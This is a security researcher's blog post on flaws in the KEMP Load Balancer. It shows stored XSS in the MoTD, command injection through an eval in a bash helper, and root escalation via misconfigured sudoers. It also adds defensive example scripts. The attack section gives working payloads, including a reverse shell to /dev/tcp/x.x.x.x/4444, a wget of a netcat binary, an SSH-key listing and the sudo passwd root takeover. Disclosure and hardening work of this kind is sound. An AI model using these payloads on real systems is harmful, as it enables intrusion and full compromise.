So back in October, Roberto SL and myself had a play with KEMP Load Balancer and found a whole load of issues with it :-) On this version I had a first pass at it and found XSS (stored), command injection (with a lovely easy privesc up to root...) and that it was vulnerable to Shellshock! Happy days...
After this, Roberto really went to town on it and smashed it! His main post is here: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
Stored XSS in the MoTD
POST'ing to /progs/doconfig/setmotd with something like "testing</textarea><script>alert(1)</script>" works nicely, and the stored value is handily presented to *every* user as soon as they log in.
Command Injection
A POST with a lone single quote as the MoTD value:

POST /progs/doconfig/setmotd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/progs/doconfig/setmotd
Cookie: JSESSIONID=XXXX
Authorization: Basic XXXX==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

motd='&motdsub=Set+MotD
The response to this contains the following:

/usr/wui/progs/util.sh: eval: line 385: unexpected EOF while looking for matching `''
/usr/wui/progs/util.sh: eval: line 386: syntax error: unexpected end of file
This refers to the following function in the bash script. The backtick-quoted post_read runs first, and its output (the raw MoTD value) is spliced into the assignment that eval then parses, wrapped in single quotes; a single quote in the value ends that quoting, so anything after it, backticks included, is evaluated as shell:

    read_post()
    {
        set -f
        eval ${1}=\'`post_read "$1" "$post"`\'
        set +f
    }
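How both of the findings so far should be handled, the eval in read_post() and the unescaped MoTD, in one script. This is an added example written for this write-up, not KEMP's code: post_read here is a constructed stand-in for KEMP's helper of that name, the body is assumed to sit in the global $post as in the original function, and read_post_safe and html_escape are names chosen for the example.

```shell
#!/bin/bash
# Added example, not KEMP's code: a safe replacement for the read_post()
# pattern above, plus escaping for the MoTD when it is rendered back into
# the textarea. Assumptions: the urlencoded POST body is in the global
# $post (as in the original), and post_read below is a constructed stand-in
# for KEMP's helper of the same name.

# Percent-decode one form value: '+' becomes space, %XX becomes the byte.
url_decode() {
    local s=${1//+/ }
    s=${s//\\/\\\\}            # keep literal backslashes literal under %b
    printf '%b' "${s//%/\\x}"
}

# Print the decoded value of field $1 from body $2, or nothing if absent.
# read -a splits on '&' without globbing, so set -f is not needed.
post_read() {
    local name=$1 body=$2 pair
    local -a pairs
    IFS='&' read -r -a pairs <<< "$body"
    for pair in "${pairs[@]}"; do
        if [ "${pair%%=*}" = "$name" ]; then
            url_decode "${pair#*=}"
            return 0
        fi
    done
    return 1
}

# Safe read_post: the target variable name is validated, and the value is
# assigned with printf -v instead of being spliced into an eval string, so
# quotes and backticks in it are stored as plain text.
read_post_safe() {
    local name=$1 value
    case "$name" in
        [A-Za-z_]*) ;;
        *) printf 'bad variable name: %s\n' "$name" >&2; return 1 ;;
    esac
    case "$name" in
        *[!A-Za-z0-9_]*) printf 'bad variable name: %s\n' "$name" >&2; return 1 ;;
    esac
    value=$(post_read "$name" "$post") || value=""
    printf -v "$name" '%s' "$value"
}

# Escape HTML metacharacters so a stored MoTD cannot close the <textarea>
# or add a <script> when it is shown to every user at login.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' \
                           -e 's/"/\&quot;/g' -e "s/'/\&#39;/g"
}

# Demo with a constructed body in the shape of the requests above: a quote
# plus backticks aimed at the eval, and a </textarea><script> tail.
demo() {
    post='motd=%27%60a+ls%60%27%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&motdsub=Set+MotD'
    read_post_safe motd
    printf 'stored : %s\n' "$motd"
    printf 'render : <textarea>%s</textarea>\n' "$(html_escape "$motd")"
}

demo
```

printf -v assigns to a variable named at runtime without re-parsing the value; on a plain POSIX sh without printf -v, the equivalent is eval "$name=\$value", which still never interpolates the value itself into the evaluated string. The name check matters as much as the assignment: without it, a caller-controlled $1 is a second way into eval.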
Some working examples:
- motd='\`a ls\`'&motdsub=Set+MotD (meh)
- motd='\`a bash --help\`'&motdsub=Set+MotD (okay...)
- motd='\`a ls -la ~/.ssh \`'&motdsub=Set+MotD (heh)
- motd='\`a echo -e \'bash -i > /dev/tcp/x.x.x.x/4444 0<\\x261 2>\\x261\'\`'&motdsub=Set+MotD (w00h00)
- motd='\` cd /tmp; wget http://x.x.x.x/nc-static-exec \`'&motdsub=Set+MotD (seriously... this thing has wget installed...)
Privesc on the box using a poorly configured sudoers:

bash-3.00$ cat /etc/sudoers
# sudoers file.
#
# User privilege specification
Defaults logfile=/dev/null,!syslog
root ALL=(ALL) ALL
bal ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate
hsync ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date
bash-3.00$ sudo /usr/bin/passwd root
New Password:XXXX
Reenter New Password: XXXX
Changing password for root.
bash-3.00$ su root -
Password: XXXX
pwd
/
touch testing
ls -la testing
-rw-r--r-- 1 root root 0 Nov 4 10:50 testing
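An audit for the sudoers problems visible in that dump, added here as an example (a script written for this write-up, not anything shipped with KEMP). It flags NOPASSWD rules on the commands the privesc above leans on and Defaults lines that turn sudo logging off; the RISKY_CMDS list is a starting point taken from the dump, not a complete catalogue, and the sample file it checks is constructed from the output above.

```shell
#!/bin/bash
# Added example, not KEMP's code: a small sudoers audit for the two problems
# visible in the dump above, NOPASSWD rules on commands that hand over root
# outright, and Defaults that switch sudo logging off. The risky-command
# list is a starting point chosen from that dump, not a complete catalogue.

# Commands that give root with no further trick when runnable without a
# password (passwd sets root's password; cp/mv/chmod/rm rewrite any file).
RISKY_CMDS=' /usr/bin/passwd /bin/cp /bin/mv /bin/chmod /bin/rm '

# Print one RISKY: line per matching command and one WARN: line per
# logging-disabling Defaults entry found in the sudoers file $1.
audit_sudoers() {
    local file=$1 line user cmds cmd
    local -a arr
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;
            Defaults*)
                case "$line" in
                    *logfile=/dev/null*|*'!syslog'*)
                        printf 'WARN: sudo logging disabled by: %s\n' "$line" ;;
                esac
                continue ;;
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        user=${line%%[[:space:]]*}
        cmds=${line#*NOPASSWD:}
        IFS=',' read -r -a arr <<< "$cmds"
        for cmd in "${arr[@]}"; do
            cmd=${cmd#"${cmd%%[![:space:]]*}"}   # trim leading whitespace
            cmd=${cmd%"${cmd##*[![:space:]]}"}   # trim trailing whitespace
            case "$RISKY_CMDS" in
                *" $cmd "*)
                    printf 'RISKY: %s may run %s as root without a password\n' "$user" "$cmd" ;;
            esac
        done
    done < "$file"
}

# Write a constructed sudoers file, copied from the dump above, to path $1.
write_sample_sudoers() {
    cat > "$1" <<'EOF'
# sudoers file.
#
# User privilege specification
Defaults logfile=/dev/null,!syslog
root ALL=(ALL) ALL
bal ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate
hsync ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date
EOF
}

# Stand-alone run against the constructed file; point audit_sudoers at
# /etc/sudoers (and /etc/sudoers.d/*) on a real box.
demo() {
    local tmp
    tmp=$(mktemp)
    write_sample_sudoers "$tmp"
    audit_sudoers "$tmp"
    rm -f "$tmp"
}

demo
```

On the dump above this reports five RISKY lines, all for bal, and one WARN for the Defaults line; hsync's NOPASSWD commands are not in the list, which is the point of keeping the list explicit rather than flagging every NOPASSWD rule.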
For anybody else wanting to check out the latest version of KEMP: the KEMP VMware image can be freely downloaded from their website. Alter the vmx file to include the line

    bios.bootOrder = "ethernet5,ethernet2,cdrom,hdd,floppy"

then boot off the Kali live CD (the 64-bit version is more useful, as a lot of the custom binaries on the KEMP build are 64-bit) and do the following to get the image open:
- mount the first sda partition in Kali
- gunzip the initrd.gz
- mkdir initrdmount
- mount -o loop initrd initrdmount
- KEMP filesystem now free to explore… :-)